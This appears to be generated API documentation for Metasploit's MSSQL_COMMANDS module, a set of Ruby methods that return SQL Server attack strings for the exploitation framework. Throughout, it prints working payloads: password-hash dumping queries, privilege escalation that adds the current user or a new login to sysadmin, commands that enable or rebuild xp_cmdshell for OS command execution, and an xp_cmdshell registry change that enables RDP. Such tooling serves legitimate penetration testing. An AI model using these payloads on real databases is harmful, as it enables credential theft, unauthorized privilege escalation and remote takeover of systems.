Module: Msf::Exploit::Remote::MSSQL_COMMANDS

Included in:
MSSQL
Defined in:
lib/msf/core/exploit/mssql_commands.rb

Overview

This module provides MSSQL specific commands in a centralized manner.

Instance Method Summary collapse

Instance Method Details

#mssql_2k5_password_hashes(opts = {}) ⇒ Object


64
65
66
# File 'lib/msf/core/exploit/mssql_commands.rb', line 64

def mssql_2k5_password_hashes(opts={})
  "SELECT name, password_hash FROM master.sys.sql_logins"
end

#mssql_2k_password_hashes(opts = {}) ⇒ Object


68
69
70
# File 'lib/msf/core/exploit/mssql_commands.rb', line 68

def mssql_2k_password_hashes(opts={})
  "SELECT name, password FROM master..sysxlogins"
end

#mssql_current_user_escalation(opts = {}) ⇒ Object

Add SQL current user to sysadmin group


60
61
62
# File 'lib/msf/core/exploit/mssql_commands.rb', line 60

def mssql_current_user_escalation(opts={})
  "declare @moo varchar(50); set @moo = (select SYSTEM_USER); exec master..sp_addsrvrolemember @moo, 'sysadmin'"
end

#mssql_db_names(opts = {}) ⇒ Object


76
77
78
# File 'lib/msf/core/exploit/mssql_commands.rb', line 76

def mssql_db_names(opts={})
  "SELECT name FROM master..sysdatabases"
end

#mssql_enumerate_servername(opts = {}) ⇒ Object

Grab servername


43
44
45
# File 'lib/msf/core/exploit/mssql_commands.rb', line 43

def mssql_enumerate_servername(opts={})
  "SELECT @@SERVERNAME"
end

#mssql_is_sysadmin(opts = {}) ⇒ Object


72
73
74
# File 'lib/msf/core/exploit/mssql_commands.rb', line 72

def mssql_is_sysadmin(opts={})
  "SELECT is_srvrolemember('sysadmin')"
end

#mssql_rdp_enable(opts = {}) ⇒ Object

Turn on RDP


38
39
40
# File 'lib/msf/core/exploit/mssql_commands.rb', line 38

def mssql_rdp_enable(opts={})
  "exec master..xp_cmdshell 'REG ADD 'HKLM\\SYSTEM\\CurrentControlSet\\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /f /d 0';"
end

#mssql_rebuild_xpcmdshell(opts = {}) ⇒ Object

Rebuild xp_cmdshell if it was deleted


33
34
35
# File 'lib/msf/core/exploit/mssql_commands.rb', line 33

def mssql_rebuild_xpcmdshell(opts={})
  "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS;DECLARE @result int, @OLEResult int, @RunResult int;DECLARE @ShellID int;EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OADestroy @ShellID;return @result;"
end

#mssql_sa_escalation(opts = {}) ⇒ Object

Add random user and random password to “sa” role on MSSQL


53
54
55
56
57
# File 'lib/msf/core/exploit/mssql_commands.rb', line 53

def mssql_sa_escalation(opts={})
  var_username = opts[:username] || rand_text_alpha(5)
  var_password = opts[:password] || rand_text_alpha(10)
  "exec sp_addlogin '#{var_username}', '#{var_password}';exec sp_addsrvrolemember '#{var_username}', 'sysadmin'"
end

#mssql_sql_info(opts = {}) ⇒ Object

Get SQL Server Version Info


48
49
50
# File 'lib/msf/core/exploit/mssql_commands.rb', line 48

def mssql_sql_info(opts={})
  "SELECT @@VERSION"
end

#mssql_sql_xpcmdshell_disable_2000(opts = {}) ⇒ Object

Disable the xp_cmdshell stored procedure in 2000


28
29
30
# File 'lib/msf/core/exploit/mssql_commands.rb', line 28

def mssql_sql_xpcmdshell_disable_2000(opts={})
  "exec sp_dropextendedproc 'xp_cmdshell';"
end

#mssql_xpcmdshell_disable(opts = {}) ⇒ Object

Disable the xp_cmdshell stored procedure on 2005 and 2008


23
24
25
# File 'lib/msf/core/exploit/mssql_commands.rb', line 23

def mssql_xpcmdshell_disable(opts={})
  "exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;"
end

#mssql_xpcmdshell_enable(opts = {}) ⇒ Object

Re-enable the xp_cmdshell stored procedure in 2005 and 2008


13
14
15
# File 'lib/msf/core/exploit/mssql_commands.rb', line 13

def mssql_xpcmdshell_enable(opts={})
  "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
end

#mssql_xpcmdshell_enable_2000(opts = {}) ⇒ Object

Re-enable the xp_cmdshell stored procedure on 2000


18
19
20
# File 'lib/msf/core/exploit/mssql_commands.rb', line 18

def mssql_xpcmdshell_enable_2000(opts={})
  "exec sp_addextendedproc 'xp_cmdshell','xp_log70.dll';exec sp_addextendedproc 'xp_cmdshell', 'C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\xplog70.dll';"
end